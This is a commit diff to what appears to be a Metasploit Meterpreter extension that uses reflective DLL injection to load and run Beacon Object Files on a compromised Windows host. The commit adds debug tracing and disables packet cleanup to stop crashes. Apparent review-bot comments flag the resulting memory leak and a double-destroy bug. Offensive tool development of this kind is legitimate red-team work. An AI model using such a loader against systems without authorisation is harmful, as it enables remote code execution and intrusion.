
bofloader nocrash

This commit is contained in:
joe 2022-09-04 19:28:41 -04:00
parent 35f950b4d2
commit 5de520f527

@ -7,13 +7,14 @@
#include "common_metapi.h" #include "common_metapi.h"
#include <stdint.h> #include <stdint.h>
#include "main.h" #include "main.h"
#include "stdlib.h"
// Required so that use of the API works. // Required so that use of the API works.
MetApi* met_api = NULL; MetApi* met_api = NULL;
#define DEBUGTRACE 1
#define RDIDLL_NOEXPORT #define RDIDLL_NOEXPORT
#include "../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c" #include "../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c"
typedef int (*goCallback)(char *, int); typedef int (*goCallback)(char *, int);
extern int LoadAndRun(char *argsBuffer, uint32_t bufferSize, goCallback callback); extern int LoadAndRun(char *argsBuffer, uint32_t bufferSize, goCallback callback);
extern char * BeaconGetOutputData(int *outsize); extern char * BeaconGetOutputData(int *outsize);
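Review bot: `#define DEBUGTRACE 1` is committed unconditionally, ahead of the ReflectiveLoader.c include, and judging by the name it is what switches on the real_dprintf tracing the rest of this commit sprinkles through request_exec_cmd, so every build of the extension now traces. If the tracing was only needed to chase the crash, the define should go, or at least be guarded so it follows the project's debug configuration rather than being on by default, e.g. `#ifdef DEBUG` / `#define DEBUGTRACE 1` / `#endif`. Separately, the new `#include "stdlib.h"` uses quotes for a system header; `#include <stdlib.h>` is the conventional form and avoids picking up a same-named file from the local include path.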
@ -43,6 +44,7 @@ DWORD request_exec_cmd(Remote *remote, Packet *packet)
char * output_data = NULL; char * output_data = NULL;
char * args_buffer = NULL; char * args_buffer = NULL;
real_dprintf("[BOFLOADER] Inside request cmd\n");
if (NULL == response) if (NULL == response)
{ {
met_api->packet.destroy(response); met_api->packet.destroy(response);
@ -51,16 +53,19 @@ DWORD request_exec_cmd(Remote *remote, Packet *packet)
buffer_size = packet->payloadLength; buffer_size = packet->payloadLength;
args_buffer = (char *) met_api->packet.get_tlv_value_raw(packet, TLV_TYPE_BOFLOADER_CMD_EXEC, &buffer_size); args_buffer = (char *) met_api->packet.get_tlv_value_raw(packet, TLV_TYPE_BOFLOADER_CMD_EXEC, &buffer_size);
real_dprintf("[BOFLOADER] got pkt contents\n");
if (args_buffer != NULL) if (args_buffer != NULL)
{ {
real_dprintf("[BOFLOADER] calling load and run\n");
if (LoadAndRun(args_buffer, (uint32_t)buffer_size, NULL)) if (LoadAndRun(args_buffer, (uint32_t)buffer_size, NULL))
{ {
real_dprintf("[BOFLOADER] load and run failed\n");
result = ERROR_BAD_COMMAND; result = ERROR_BAD_COMMAND;
} }
else else
{ {
real_dprintf("[BOFLOADER] getting out data\n");
output_data = BeaconGetOutputData(&outdata_size); output_data = BeaconGetOutputData(&outdata_size);
} }
@ -68,21 +73,24 @@ DWORD request_exec_cmd(Remote *remote, Packet *packet)
{ {
met_api->packet.add_tlv_string(response, TLV_TYPE_BOFLOADER_CMD_RESULT, output_data); met_api->packet.add_tlv_string(response, TLV_TYPE_BOFLOADER_CMD_RESULT, output_data);
} }
} }
else else
{ {
result = ERROR_INVALID_PARAMETER; result = ERROR_INVALID_PARAMETER;
} }
dprintf("[BOFLOADER] Finished executing, if success will recv output data."); real_dprintf("[BOFLOADER] Finished executing, if success will recv output data.");
met_api->packet.transmit_response(result, remote, response); met_api->packet.transmit_response(result, remote, response);
real_dprintf("[BOFLOADER] response sent");
if (NULL != response) //FIXME -- freeing the memory crashes meterpreter sessions
#if 0
if (response)
met_api->packet.destroy(response); met_api->packet.destroy(response);
if (NULL != packet) if (packet)
met_api->packet.destroy(packet); met_api->packet.destroy(response);
dprintf("[BOFLOADER] Done."); #endif
real_dprintf("[BOFLOADER] Done.");
return ERROR_SUCCESS; return ERROR_SUCCESS;
} }
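Review bot: The `#if 0` block now skips destroying both `response` and `packet` at the end of request_exec_cmd, so every exec_cmd request leaks both packets for the lifetime of the session. The disabled code also carries a copy-paste error that is a likely cause of the crash the FIXME describes: under `if (packet)` it calls `met_api->packet.destroy(response)` instead of `met_api->packet.destroy(packet)`, destroying the response twice. Restoring the cleanup with the correct argument, `if (response) met_api->packet.destroy(response);` followed by `if (packet) met_api->packet.destroy(packet);`, is the fix to try first; if the dispatcher that invokes this handler already frees the request packet, then only the response should be destroyed here, which is worth confirming against the other extensions' command handlers. Either way the real_dprintf lines added above this block are unaffected. The start of request_exec_cmd lies outside this hunk.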
@ -93,11 +101,11 @@ DWORD request_exec_cmd(Remote *remote, Packet *packet)
* @param remote Pointer to the remote instance. * @param remote Pointer to the remote instance.
* @return Indication of success or failure. * @return Indication of success or failure.
*/ */
DWORD InitServerExtension(MetApi* api, Remote* remote) DWORD InitServerExtension(MetApi* api, Remote* remote)
{ {
met_api = api; met_api = api;
SET_LOGGING_CONTEXT(api) SET_LOGGING_CONTEXT(api)
met_api->command.register_all(customCommands); met_api->command.register_all(customCommands);